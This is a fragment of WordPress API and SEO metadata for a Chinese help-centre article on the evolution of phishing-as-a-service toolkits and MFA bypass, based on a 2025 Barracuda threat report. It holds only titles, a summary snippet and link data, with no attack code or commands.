name=search_term_string\"}],\"inLanguage\":\"zh-Hans\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-Hans\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery\",\"contentUrl\":\"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery\",\"caption\":\"admin\"},\"sameAs\":[\"http:\/\/wp.wsisp.com\"],\"url\":\"https:\/\/www.wsisp.com\/helps\/author\/admin\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\u9493\u9c7c\u5373\u670d\u52a1\u5de5\u5177\u5305\u6f14\u8fdb\u4e0e\u591a\u56e0\u7d20\u8ba4\u8bc1\u7ed5\u8fc7\u673a\u5236\u7814\u7a76\u2014\u2014\u57fa\u4e8e2025\u5e74Barracuda\u5a01\u80c1\u60c5\u62a5\u7684\u5b9e\u8bc1\u5206\u6790 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.wsisp.com\/helps\/77263.html","og_locale":"zh_CN","og_type":"article","og_title":"\u9493\u9c7c\u5373\u670d\u52a1\u5de5\u5177\u5305\u6f14\u8fdb\u4e0e\u591a\u56e0\u7d20\u8ba4\u8bc1\u7ed5\u8fc7\u673a\u5236\u7814\u7a76\u2014\u2014\u57fa\u4e8e2025\u5e74Barracuda\u5a01\u80c1\u60c5\u62a5\u7684\u5b9e\u8bc1\u5206\u6790 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","og_description":"\u6458\u8981\u9493\u9c7c\u5373\u670d\u52a1&#xff08;Phishing-as-a-Service&#xff0c;PhaaS&#xff09;\u6a21\u5f0f\u7684\u5546\u4e1a\u5316\u53d1\u5c55\u663e\u8457\u964d\u4f4e\u4e86\u7f51\u7edc\u72af\u7f6a\u7684\u6280\u672f\u95e8\u69db&#xff0c;\u4f7f\u5f97\u4e0d\u5177\u5907\u6df1\u5ea6\u6280\u672f\u80fd\u529b\u7684\u653b\u51fb\u8005\u4e5f\u80fd\u53d1\u8d77\u590d\u6742\u7684\u51ed\u8bc1\u7a83\u53d6\u653b\u51fb\u3002\u672c\u6587\u57fa\u4e8eBarracuda Networks 2025\u5e74\u5ea6\u5a01\u80c1\u60c5\u62a5\u62a5\u544a&#xff0c;\u5bf9PhaaS\u5de5\u5177\u5305\u7684\u6280\u672f\u6f14\u8fdb\u8def\u5f84\u8fdb\u884c\u7cfb\u7edf\u6027\u5206\u6790\u3002\u7814\u7a76\u53d1\u73b0&#xff0c;2025\u5e74\u5df2\u77e5PhaaS\u5de5\u5177\u5305\u6570\u91cf\u540c\u6bd4\u589e\u957f100%&#xff0c;\u5176\u4e2d\u8fd1\u534a\u6570\u96c6\u6210\u591a\u56e0\u7d20\u8ba4\u8bc1","og_url":"https:\/\/www.wsisp.com\/helps\/77263.html","og_site_name":"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","article_published_time":"2026-02-24T01:41:16+00:00","og_image":[{"url":"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/02\/20260224014114-699d01ba9c30c.jpg"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"\u4f5c\u8005":"admin","\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4":"10 \u5206"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.wsisp.com\/helps\/77263.html","url":"https:\/\/www.wsisp.com\/helps\/77263.html","name":"\u9493\u9c7c\u5373\u670d\u52a1\u5de5\u5177\u5305\u6f14\u8fdb\u4e0e\u591a\u56e0\u7d20\u8ba4\u8bc1\u7ed5\u8fc7\u673a\u5236\u7814\u7a76\u2014\u2014\u57fa\u4e8e2025\u5e74Barracuda\u5a01\u80c1\u60c5\u62a5\u7684\u5b9e\u8bc1\u5206\u6790 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","isPartOf":{"@id":"https:\/\/www.wsisp.com\/helps\/#website"},"datePublished":"2026-02-24T01:41:16+00:00","dateModified":"2026-02-24T01:41:16+00:00","author":{"@id":"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41"},"breadcrumb":{"@id":"https:\/\/www.wsisp.com\/helps\/77263.html#breadcrumb"},"inLanguage":"zh-Hans","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.wsisp.com\/helps\/77263.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.wsisp.com\/helps\/77263.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9875","item":"https:\/\/www.wsisp.com\/helps"},{"@type":"ListItem","position":2,"name":"\u9493\u9c7c\u5373\u670d\u52a1\u5de5\u5177\u5305\u6f14\u8fdb\u4e0e\u591a\u56e0\u7d20\u8ba4\u8bc1\u7ed5\u8fc7\u673a\u5236\u7814\u7a76\u2014\u2014\u57fa\u4e8e2025\u5e74Barracuda\u5a01\u80c1\u60c5\u62a5\u7684\u5b9e\u8bc1\u5206\u6790"}]},{"@type":"WebSite","@id":"https:\/\/www.wsisp.com\/helps\/#website","url":"https:\/\/www.wsisp.com\/helps\/","name":"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","description":"\u9999\u6e2f\u670d\u52a1\u5668_\u9999\u6e2f\u4e91\u670d\u52a1\u5668\u8d44\u8baf_\u670d\u52a1\u5668\u5e2e\u52a9\u6587\u6863_\u670d\u52a1\u5668\u6559\u7a0b","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.wsisp.com\/helps\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"zh-Hans"},{"@type":"Person","@id":"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41","name":"admin","image":{"@type":"ImageObject","inLanguage":"zh-Hans","@id":"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/image\/","url":"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery","contentUrl":"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery","caption":"admin"},"sameAs":["http:\/\/wp.wsisp.com"],"url":"https:\/\/www.wsisp.com\/helps\/author\/admin"}]}},"_links":{"self":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/posts\/77263","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/comments?post=77263"}],"version-history":[{"count":0,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/posts\/77263\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/media\/77260"}],"wp:attachment":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/media?parent=77263"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/categories?post=77263"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/tags?post=77263"},{"taxonomy":"topic","embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/topic?post=77263"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}